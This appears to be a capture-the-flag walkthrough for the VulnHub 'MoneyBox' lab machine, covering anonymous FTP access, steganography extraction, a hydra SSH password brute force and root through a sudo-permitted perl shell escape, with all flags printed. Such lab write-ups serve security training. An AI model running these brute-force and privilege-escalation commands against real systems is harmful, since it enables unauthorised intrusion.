Initial Enumeration and User Shell

As usual, I started with a nmap scan looking for open ports and running services.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ nmap -sC -sV -oA nmap/initial 192.168.1.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 23:04 IST
Nmap scan report for 192.168.1.2 
Host is up (0.00085s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0         1093656 Feb 26 08:48 trytofind.jpg
| ftp-syst:            
|   STAT:         
| FTP server status:             
|      Connected to ::ffff:192.168.1.3  
|      Logged in as ftp                
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text                         
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable                    
|_End of status
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
|   256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_  256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: MoneyBox
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.59 seconds

We have a FTP server running on port 21, SSH on port 22 and Apache web server on port 80.  Port 21 has anonymous login allowed, so I started enumerating it first. Enter the username anonymous, leave the password field empty and press enter.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ ftp 192.168.1.2
Connected to 192.168.1.2.
220 (vsFTPd 3.0.3)
Name (192.168.1.2:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0         1093656 Feb 26 08:48 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
226 Transfer complete.
1093656 bytes received in 0.10 secs (10.5665 MB/s)
ftp> exit
221 Goodbye.

We have a image named trytofind.jpg which looks like this:

We can see some white marks on the image, which suggests that this image has some data encrypted within it. We can use steghide to extract the hidden data.

I tried extracting the data using steghide using no password but that did not work. This means that we need to find the password to extract data from the image.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ steghide --extract -sf trytofind.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Next, I started enumerating the port 80 to see if we can find any password there:

We do not have anything interesting on the home page, Also I checked the source code of the page but did not find anything useful. Next I performed a gobuster scan to look for hidden files or directories and found a directory name /blogs.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ gobuster dir -u http://192.168.1.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.zip,.jpg,.js,.css
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.2
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     zip,jpg,js,css,php,html,txt
[+] Timeout:        10s
===============================================================
2021/03/05 23:12:07 Starting gobuster
===============================================================
/index.html (Status: 200)
/blogs (Status: 301)
/server-status (Status: 403)
===============================================================
2021/03/05 23:27:18 Finished
===============================================================

After visiting the /blogs directory  I again checked and scrolled down through the source code and this time there was a secret message.

I visited the /S3cr3t-T3xt directory and in its source code, I found another comment which contained the password we wanted.

I used this to extract data from the trytofind.png using steghide and this time I found a data.txt.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]                               
└─$ steghide --extract -sf trytofind.jpg1 
Enter passphrase:
wrote extracted data to "data.txt".

After reading the contents of data.txt, I found a username renu and the hint that renu is using a weak password, so we brute force the SSH login.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ cat data.txt 
Hello.....  renu

      I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......

Next, I used hydra to brute force the login password and found the password 987654321.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt 192.168.1.2 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-05 23:30:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.2:22/
[22][ssh] host: 192.168.1.2   login: renu   password: 987654321
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-05 23:30:26

We can now login via SSH using username renu and password 987654321.

┌──(madhav㉿kali)-[~/Documents/vulnhub/moneyBox]
└─$ ssh [email protected]
The authenticity of host '192.168.1.2 (192.168.1.2)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.2' (ECDSA) to the list of known hosts.
[email protected]'s password:
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
[email protected]:~$ ls
ftp  user1.txt
[email protected]:~$ cat user1.txt
Yes...!
You Got it User1 Flag

 ==> us3r1{F14g:0ku74tbd3777y4}

[email protected]:~$

Privilege Escalation

Next, I checked for other users on the box and found a user lily. I checked the .ssh directory of user lily and found that user renu was added in the authorized_keys file.

[email protected]:/home/lily/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIi
VrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlv
IVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 [email protected]

This means that user renu can directly login as user lily via SSH without using any password. So I switched to user lily using the following command and got our second flag:

[email protected]:/home/lily/.ssh$ ssh [email protected]
The authenticity of host '192.168.1.2 (192.168.1.2)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.2' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
[email protected]:~$ ls
user2.txt
[email protected]:~$ cat user2.txt
Yeah.....
You Got a User2 Flag

==> us3r{F14g:tr5827r5wu6nklao}

[email protected]:~$

Root Shell

Gaining a root shell was quite easy. I ran the sudo -l command and found that user lily can run /usr/bin/perl as root.

[email protected]:/home$ sudo -l
Matching Defaults entries for lily on MoneyBox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lily may run the following commands on MoneyBox:
    (ALL : ALL) NOPASSWD: /usr/bin/perl

I checked on GTFOBins and found that we can spawn a root shell by using the following command:

[email protected]:/home$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/home#

Hurray! we are root and now we can read our final flag present in the home directory.

[email protected]:~# cat .root.txt

Congratulations.......!

You Successfully completed MoneyBox

Finally The Root Flag
    ==> r00t{H4ckth3p14n3t}

I'm Kirthik-KarvendhanT
    It's My First CTF Box
         
instagram : ____kirthik____

See You Back....

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Alexey Kuvaldin.